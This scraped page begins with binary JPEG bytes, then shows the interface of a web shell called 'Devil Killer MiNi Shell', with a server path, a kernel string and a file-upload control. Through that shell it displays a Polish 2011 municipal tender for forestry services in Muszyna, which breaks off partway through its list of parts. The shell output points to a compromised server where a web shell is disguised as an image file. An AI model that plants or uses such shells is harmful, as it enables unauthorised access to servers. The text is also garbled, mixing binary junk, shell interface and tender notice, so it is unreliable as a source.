JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110131/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110131/15276-N-2011.html

<p class="kh_header"><b>Muszyna: Pozyskanie i zrywka drewna oraz hodowla i ochrona lasu w lasach gminnych w roku 2011</b><br>
<b>Numer ogłoszenia: 15276 - 2011; data zamieszczenia: 31.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Uzdrowiskowa Muszyna - Burmistrz Miasta i Gminy Uzdrowiskowej Muszyna , Rynek 31, 33-370 Muszyna, woj. małopolskie, tel. 018 4725940, faks 018 4777921.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muszyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pozyskanie i zrywka drewna oraz hodowla i ochrona lasu w lasach gminnych w roku 2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres usługi obejmuje:
1. W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany będzie do: 
a) pozyskania i zrywki drewna
b) manipulacji drewna, łupania i składania drewna S2b i S4  w stosy (max grubość szczapy 24-28 cm).
c) hodowli i ochrony lasu,
w lasach stanowiących własność Miasta i Gminy Uzdrowiskowej Muszyna w roku 2011. 
Opis części zamówienia.
Zamawiający dopuszcza składania ofert częściowych na poszczególne zadania:
ZDANIE Nr 1 Las mienia gminnego Szczawnik
1. Las mienia gminnego Szczawnik oddział 1i, odległość do 500 m 
1. W- buk w ilości 281,00 mp
2. S2b- buk w ilości 275,31mp /193,00m3
3. S4- buk w ilości 28,57 mp /20,00 m3
Razem	- 303,88 mp /494,00 m3
Składanie gałęzi w stosy po ścięciu drzew 494,00 m3
2. Las mienia gminnego Szczawnik oddział 1k, odległość do 500 m 
1. W- świerk w ilości 24,00 mp
2. S2b- świerk w ilości 20,00 mp /14,00 m3
3. S4- świerk w ilości	2,00 mp/1,40 m3
Razem	- 22,00 mp/39,40 m3
Składanie gałęzi w stosy po ścięciu drzew- 39,40 m3
3. Las mienia gminnego Szczawnik oddział 1o, odległość do 500 m 
1.W- buk w ilości 352,00 mp
2. S2b-buk w ilości 235,00 mp/165,00 m3
3.S4- buk w ilości 7,00 mp/4,90 m3
Razem	- 242,00 mp /521,90 m3
Składanie gałęzi w stosy po ścięciu drzew 521,90 m3
4. Las mienia gminnego Szczawnik oddział 1p, odległość do 500 m 
1. W- świerk w ilości 5,00 mp
2. S2b- świerk	w ilości 8,00 mp /5,60 m3
3. S4- świerk w ilości 1,00 mp/0,70 m3
Razem	- 9,00 mp /11,30 m3
Składanie gałęzi w stosy po ścięciu drzew 11,30 m3
5. Las mienia gminnego Szczawnik oddział 1r, odległość do 500 m 
1. W- buk, sosna w ilości 27,00 mp
2. S2b- buk, sosna w ilości 20,00 mp /14,00 m3
3. S4- buk, sosna w ilości 2,00 mp /1,40 m3
Razem- 22,00 mp/42,40 m3
Składanie gałęzi w stosy po ścięciu drzew- 42,40 m3
6. Hodowla i ochrona lasu - las mienia gminnego Szczawnik oddz. 1 d,1o 
Hodowla i ochrona lasu - las mienia gminnego Szczawnik oddz. 1 d , 1o  
Pielęgnacja upraw jodły pow. 0,60 ha /1h
Zabezpieczenie upraw jodły pow. 1,50 ha /1h
ZADANIE Nr 2 Las mienia gminnego Złockie
1. Las mienia gminnego Złockie oddział 1b, odległość do 500 m3
1. W- buk w ilości sosna,świerk 240,00 mp
2. S2b- buk w ilości sosna,świerk 185,71 mp/130,00 m3
3. S4- buk w ilości sosna, świerk 14,28 mp /10,00m3
Razem- 199,99 mp /380,00 m3
Składanie gałęzi w stosy po ścięciu drzew  380,00 m3
2. Las mienia gminnego Złockie oddział i, odległość do 500 m.
1. W- w ilości sosna, świerk 20,00 mp
2. S2b- w ilości sosna, świerk	28,57 mp /20,00 m3
3. S4- w ilości sosna, świerk	12,85 mp/9,00 m3
Razem- 41,42 mp /49,00 m3
Składanie gałęzi w stosy po ścięciu drzew 49,00 m3
3. Hodowla i ochrona lasu -  las mienia gminnego Muszyna  oddz. 1 h 
Hodowla i ochrona lasu -  las mienia gminnego Muszyna  oddz. 1 h
Pielęgnacja upraw jodły i świerka pow. 0,60 ha/ 1h
Zabezpieczenie upraw jodły i świerka pow. 0,60 ha/ 1h
ZADANIE Nr 3 Las mienia gminnego Jastrzębik
1. Las mienia gminnego Jastrzębik - oddział 1a, odległość do 500 m 
1. W- w ilości buk, jodła, sosna 120,00 mp
2. S2b- w ilości buk, jodła, sosna 71,42mp /50,00m3
3. S4- w ilości buk, jodła, sosna 14,28 mp/10,00 m3
Raze 85,70 mp/180,00 m3
Składanie gałęzi w stosy po ścięciu drzew  180,00 m3
2. Las mienia gminnego Jastrzębik - oddział 1c, odległość do 500 m
1. W- w ilości buk, jodła, sosna 100,00
2. S2b- w ilości buk, jodła, sosna 57,14/40,00
3. S4- w ilości buk, jodła, sosna 10,00/7,00
Razem- 67,14/147,00
Składanie gałęzi w stosy po ścięciu drzew 147,00 m3
ZADANIE Nr 4 Las mienia gminnego Leluchów 
1. Las mienia gminnego Leluchów oddział 2d odległość do 500 m 
1. W- w ilości buk 60,00mp
2. S2b- w ilości buk 54,28 mp/38,00 m3
3. S4- w ilości buk 2,85 mp /2,00 m3
Razem	- 57,13 mp /100,00 m3
Składanie gałęzi w stosy po ścięciu drzew 100,00 m3
2. Las mienia gminnego Leluchów oddział 2 i , odległość do 500 m 
1. S2b- w ilości olsza	37,00mp /24,05m3
2. S4- w ilości olsza 4,00/2.60
Razem	- 41,00 mp /26,65m3
Składanie gałęzi w stosy po ścięciu drzew 26,65m3                                     
3. Las mienia gminnego Leluchów oddział 1 m, odległość do 500 m 
1. S2b- w ilości olsza 36,92mp /24,00m3
2. S4- w ilości olsza 1,30 mp /2,00 m3
Razem	- 38,22mp /26,00m3
Składanie gałęzi w stosy po ścięciu drzew  26,00 m3
4.Las mienia gminnego Leluchów oddział 1g, odległość do 500 m
1. W- w ilości modrzew 40,00 mp
2. S2b- w ilości modrzew 15,38 mp/10,00m3
3. S4- w ilości modrzew 7,69 mp /5,00 m3
Razem	- 23,07 mp /55,00 m3
Składanie gałęzi w stosy po ścięciu drzew 55,00 m3

5. Las mienia gminnego Leluchów oddział - PCL - użytki przygodne 
1. W- w ilości buk 30,00 mp
2. S2b- w ilości buk 42,82 mp /30,00m3
3. S4- w ilości buk14,28 mp /10,00 m3
Razem	- 57,10 mp /70,00 m3
Składanie gałęzi w stosy po ścięciu drzew  70,00 m3                                                                               
6. Las mienia gminnego Leluchów oddział - PCL- użytki przygodne 
1.  S2b- w ilości olsza 38,46 mp /25,00 m3
2.  S4- w ilości olsza 15,38 mp /10,00 m3
Razem	- 53,84 mp /35,00 m3
Składanie gałęzi w stosy po ścięciu drzew 35,00 m3
7. Hodowla i ochrona lasu - las mienia gminnego Leluchów oddz. 1g
Hodowla i ochrona lasu - las mienia gminnego Leluchów oddz. 1g
Czyszczenie późne młodnika pow. 2,32 h/ 1h
ZADANIE Nr 5 Las mienia gminnego Żegiestów 
1. Las mienia gminnego Żegiestów oddział - PCL - użytki przygodne 
1.  W- w ilości buk 30,00 mp
2.  S2b- w ilości buk 42,82 mp /30,00 m3
3.  S4- w ilości buk 14,28 mp /10,00 m3
Razem	- 57,10 mp /70,00 m3
Składanie gałęzi w stosy po ścięciu drzew  70,00 m3 
W przypadku braku nabywcy na zakup drewna wielkowymiarowego Zamawiający zastrzega sobie prawo ograniczenia pozyskania i zrywki jego ilości..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.Zamawiający przewiduje w przypadku udzielenia, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5, 77.21.15.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu o udzielenie zamówienia publicznego nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie przez Wykonawcę warunków udziału w postępowaniu na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunków udziału w postępowaniu przez Wykonawcę zostanie dokona na zasadzie: wykonawca spełnia/nie spełnia poszczególne warunki</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie przez Wykonawcę warunków udziału w postępowaniu na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunków udziału w postępowaniu przez Wykonawcę zostanie dokona na zasadzie: wykonawca spełnia/nie spełnia poszczególne warunki</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie przez Wykonawcę warunków udziału w postępowaniu na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunków udziału w postępowaniu przez Wykonawcę zostanie dokona na zasadzie: wykonawca spełnia/nie spełnia poszczególne warunki</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie przez Wykonawcę warunków udziału w postępowaniu na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunków udziału w postępowaniu przez Wykonawcę zostanie dokona na zasadzie: wykonawca spełnia/nie spełnia poszczególne warunki</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie przez Wykonawcę warunków udziału w postępowaniu na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunków udziału w postępowaniu przez Wykonawcę zostanie dokona na zasadzie: wykonawca spełnia/nie spełnia poszczególne warunki</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o odbyciu wizji lokalnej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z treścią art. 144 ust.1 ustawy Prawo Zamówień publicznych przewiduje możliwość zmiany postanowień treści umowy, w następujących przypadkach:
a) Konieczność przedłużenia terminu umownego z powodu:
- działania siły wyższej, tj. wyjątkowego zdarzenia lub 
- okoliczności, ( np. przeszkody atmosferyczne o charakterze katastrof)
Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji dostawy, który przy składaniu ofert musi być normalnie brany pod uwagę.
- z przyczyn zależnych od Zamawiającego, tj. z powodu nadzwyczajnych zdarzeń gospodarczych niezależnych od Zamawiającego, których Zamawiający nie mógł przewidzieć w chwili zawarcia umowy,
b) ograniczenie zakresu usługi wynikające z wprowadzenia zmian które wynikły w trakcie realizacji i były konieczne w celu prawidłowej realizacji przedmiotu zamówienia .
c) konieczność zmiany terminu umownego i harmonogramu realizacji usługi z powodu:
- konieczności wykonania dodatkowych badań, ekspertyz, analiz itp.
- konieczności wykonania usług zamiennych niewykraczających poza zakres przedmiotu zamówienia, a koniecznych dla wykonania całości robót i uzyskania złożonego efektu użytkowego,
- konieczności wykonania prac wynikających  z zaleceń organów uprawnionych 
2) W przypadku żądania przedłużenia terminu umownego z przyczyn zależnych od Wykonawcy, zostanie przeprowadzona następująca procedura:
a) Wykonawca prześle Zamawiającemu projekt zmian do umowy (aneks) w terminie co najmniej 14 dni przed datą upływu terminu zakończenia umowy wraz z pisemnym uzasadnieniem,
b) Zamawiający udzieli pisemnej odpowiedzi lub odeśle podpisany aneks do umowy przed upływem terminu wykonania umowy.
3) Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy.
4) W przypadku takich zmian jak; adres, nr rachunku bankowego, czy personelu technicznego obsługi robót, wystarczy pisemne poinformowanie Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muszyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Uzdrowiskowej Muszyna ul. Rynek 31, 33-370 Muszyna. Pok. Nr 21..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2011 godzina 11:50, miejsce: Urząd Miasta i Gminy Uzdrowiskowej Muszyna ul. Rynek 31, 33-370 Muszyna. Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Las mienia gminnego Szczawnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZDANIE Nr 1 Las mienia gminnego Szczawnik
1. Las mienia gminnego Szczawnik oddział 1i, odległość do 500 m 
1. W- buk w ilości 281,00 mp
2. S2b- buk w ilości 275,31mp /193,00m3
3. S4- buk w ilości 28,57 mp /20,00 m3
Razem	- 303,88 mp /494,00 m3
Składanie gałęzi w stosy po ścięciu drzew 494,00 m3
2. Las mienia gminnego Szczawnik oddział 1k, odległość do 500 m 
1. W- świerk w ilości 24,00 mp
2. S2b- świerk w ilości 20,00 mp /14,00 m3
3. S4- świerk w ilości	2,00 mp/1,40 m3
Razem	- 22,00 mp/39,40 m3
Składanie gałęzi w stosy po ścięciu drzew- 39,40 m3
3. Las mienia gminnego Szczawnik oddział 1o, odległość do 500 m 
1.W- buk w ilości 352,00 mp
2. S2b-buk w ilości 235,00 mp/165,00 m3
3.S4- buk w ilości 7,00 mp/4,90 m3
Razem	- 242,00 mp /521,90 m3
Składanie gałęzi w stosy po ścięciu drzew 521,90 m3
4. Las mienia gminnego Szczawnik oddział 1p, odległość do 500 m 
1. W- świerk w ilości 5,00 mp
2. S2b- świerk	w ilości 8,00 mp /5,60 m3
3. S4- świerk w ilości 1,00 mp/0,70 m3
Razem	- 9,00 mp /11,30 m3
Składanie gałęzi w stosy po ścięciu drzew 11,30 m3
5. Las mienia gminnego Szczawnik oddział 1r, odległość do 500 m 
1. W- buk, sosna w ilości 27,00 mp
2. S2b- buk, sosna w ilości 20,00 mp /14,00 m3
3. S4- buk, sosna w ilości 2,00 mp /1,40 m3
Razem- 22,00 mp/42,40 m3
Składanie gałęzi w stosy po ścięciu drzew- 42,40 m3
6. Hodowla i ochrona lasu - las mienia gminnego Szczawnik oddz. 1 d,1o 
Hodowla i ochrona lasu - las mienia gminnego Szczawnik oddz. 1 d , 1o  
Pielęgnacja upraw jodły pow. 0,60 ha /1h
Zabezpieczenie upraw jodły pow. 1,50 ha /1h.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5, 77.21.15.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Las mienia gminnego Złockie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE Nr 2 Las mienia gminnego Złockie
1. Las mienia gminnego Złockie oddział 1b, odległość do 500 m3
1. W- buk w ilości sosna,świerk 240,00 mp
2. S2b- buk w ilości sosna,świerk 185,71 mp/130,00 m3
3. S4- buk w ilości sosna, świerk 14,28 mp /10,00m3
Razem- 199,99 mp /380,00 m3
Składanie gałęzi w stosy po ścięciu drzew  380,00 m3
2. Las mienia gminnego Złockie oddział i, odległość do 500 m.
1. W- w ilości sosna, świerk 20,00 mp
2. S2b- w ilości sosna, świerk	28,57 mp /20,00 m3
3. S4- w ilości sosna, świerk	12,85 mp/9,00 m3
Razem- 41,42 mp /49,00 m3
Składanie gałęzi w stosy po ścięciu drzew 49,00 m3
3. Hodowla i ochrona lasu -  las mienia gminnego Muszyna  oddz. 1 h 
Hodowla i ochrona lasu -  las mienia gminnego Muszyna  oddz. 1 h
Pielęgnacja upraw jodły i świerka pow. 0,60 ha/ 1h
Zabezpieczenie upraw jodły i świerka pow. 0,60 ha/ 1h.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5, 77.21.15.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Las mienia gminnego Jastrzębik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE Nr 3 Las mienia gminnego Jastrzębik
1. Las mienia gminnego Jastrzębik - oddział 1a, odległość do 500 m 
1. W- w ilości buk, jodła, sosna 120,00 mp
2. S2b- w ilości buk, jodła, sosna 71,42mp /50,00m3
3. S4- w ilości buk, jodła, sosna 14,28 mp/10,00 m3
Raze 85,70 mp/180,00 m3
Składanie gałęzi w stosy po ścięciu drzew  180,00 m3
2. Las mienia gminnego Jastrzębik - oddział 1c, odległość do 500 m
1. W- w ilości buk, jodła, sosna 100,00
2. S2b- w ilości buk, jodła, sosna 57,14/40,00
3. S4- w ilości buk, jodła, sosna 10,00/7,00
Razem- 67,14/147,00
Składanie gałęzi w stosy po ścięciu drzew 147,00 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5, 77.21.15.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Las mienia gminnego Leluchów.</p>
